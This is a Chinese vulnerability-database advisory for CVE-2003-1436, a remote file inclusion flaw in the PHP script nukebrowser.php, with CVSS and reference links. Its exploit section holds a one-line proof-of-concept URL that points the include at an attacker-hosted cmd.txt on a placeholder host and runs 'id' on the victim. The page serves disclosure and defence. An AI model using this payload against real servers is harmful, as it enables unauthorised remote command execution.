Nukebrowser远程包含漏洞

Nukebrowser远程包含漏洞

漏洞ID 1107176 漏洞类型 代码注入
发布时间 2003-01-30 更新时间 2003-12-31
图片[1]-Nukebrowser远程包含漏洞-安全小百科CVE编号 CVE-2003-1436
图片[2]-Nukebrowser远程包含漏洞-安全小百科CNNVD-ID CNNVD-200312-184
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/22206
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-184
|漏洞详情
Nukebrowser是一个用PHP写的CGI程序。Nukebrowser的nukebrowser.php脚本文件存在漏洞,远程攻击者可以包含其它服务器上的任意文件执行系统命令。远程攻击者可以在其控制的服务器上上传一个恶意PHP指令的文件,然后在URL的参数里引用包含这个恶意脚本文件,就可以在受影响服务器上执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/6731/info

Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file.

Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.

http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id
|参考资料

来源:SECTRACK
名称:1006031
链接:http://securitytracker.com/id?1006031
来源:XF
名称:nukebrowser-php-file-include(11217)
链接:http://xforce.iss.net/xforce/xfdb/11217
来源:BID
名称:6731
链接:http://www.securityfocus.com/bid/6731
来源:SECUNIA
名称:7986
链接:http://secunia.com/advisories/7986
来源:NSFOCUS
名称:4304
链接:http://www.nsfocus.net/vulndb/4304

相关推荐: Trend Micro InterScan VirusWall HTTP 1.1 Transfer-Encoding Bypass Vulnerability

Trend Micro InterScan VirusWall HTTP 1.1 Transfer-Encoding Bypass Vulnerability 漏洞ID 1101620 漏洞类型 Design Error 发布时间 2002-09-12 更新时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享